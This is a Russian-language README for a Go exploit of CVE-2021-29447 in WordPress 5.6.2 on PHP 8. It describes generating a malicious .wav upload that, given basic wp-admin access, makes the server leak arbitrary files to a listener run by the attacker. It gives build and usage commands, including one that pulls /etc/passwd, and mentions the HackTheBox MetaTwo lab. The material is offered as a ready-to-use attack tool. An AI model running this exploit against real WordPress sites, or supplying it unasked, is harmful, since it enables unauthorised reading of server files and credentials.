
Exploit на Go для CVE-2021-29447, нацеленный на WordPress 5.6.2 с PHP 8. Генерирует вредоносный .wav payload для извлечения произвольных файлов с сервера через загрузку медиа, требует базового доступа к wp-admin.
Только в образовательных целях.
Этот эксплойт представляет собой очень удобный инструмент для получения любого файла с сервера, работающего на WordPress 5.6.2 и php8. (см. https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5)
Всё, что нужно, — это базовый доступ к wp-admin и возможность загрузить медиафайл.
Эксплойт сгенерирует полезную нагрузку в виде .wav файла для загрузки через wp-admin.
Затем он использует бэк-сервер эксплойта, чтобы сразу выдать вам нужный файл прямо в консоль.
Идеальное применение — машина HackTheBox metatwo https://www.hackthebox.com/machines/metatwo

$ go build
$ chmod +x exploit_cve-2021-29447
$ ./exploit_cve-2021-29447 --help
Usage of ./exploit_cve-2021-29447:
-local-server-ip string
Use local server ip where a local server will be set
-local-server-port int
Use local server port to run local server on
-o string
Output file to save exploit's result
-target-path string
Use target path to point on file you want to get from target server
$ ./exploit_cve-2021-29447 -local-server-ip=<your ip address> -target-path=/etc/passwd